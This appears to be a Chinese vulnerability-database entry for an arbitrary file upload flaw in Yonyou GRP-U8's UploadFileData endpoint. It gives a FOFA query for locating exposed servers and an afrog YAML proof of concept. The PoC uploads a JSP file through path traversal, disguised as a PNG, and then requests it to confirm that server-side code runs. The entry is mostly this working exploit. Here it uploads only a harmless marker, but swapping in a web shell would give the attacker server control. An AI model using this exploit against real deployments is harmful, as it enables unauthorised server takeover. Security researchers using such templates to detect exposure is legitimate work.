yonyou-grp-u8-uploadfiledata: 用友 GRP-U8 UploadFileData 任意文件上传

日期: 2025-09-01 | 影响软件: 用友GRP-U8 | POC: 已公开

漏洞描述

用友 GRP-U8 UploadFileData接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限 fofa: title="用友GRP-U8行政事业内控管理软件"

PoC代码[已公开]

id: yonyou-grp-u8-uploadfiledata

info:
  name: 用友 GRP-U8 UploadFileData 任意文件上传
  author: zan8in
  severity: critical
  verified: true
  description: |
    用友 GRP-U8 UploadFileData接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限
    fofa: title="用友GRP-U8行政事业内控管理软件"
  reference:
    - https://mp.weixin.qq.com/s/DZXFxLC7fFKbPUWrdyITag

set:
  randstr: randomLowercase(5)
  randbody: randomLowercase(28)
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /UploadFileData?action=upload_file&&foldername=/..&filename=/{{randstr}}.jsp
      headers:
        DNT: 1
        Connection: close
        Upgrade-Insecure-Requests: 1
        Accept-Encoding: gzip
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/form-data; boundary=WebKitFormBoundary{{rboundary}}
      body: "\
        --WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\r\n\
        Content-Type: image/png\r\n\
        \r\n\
        <% out.println(\"Hello yongyouU8 {{randbody}}\");%>\r\n\
        --WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 200 && response.body.bcontains(b'parent.showSucceedMsg();') && response.body.bcontains(b'parent.openWin.location.reload();')
  r1:
    request:
      method: GET
      path: /R9iPortal/{{randstr}}.jsp
    expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/yonyou-grp-u8-uploadfiledata.yaml

相关漏洞推荐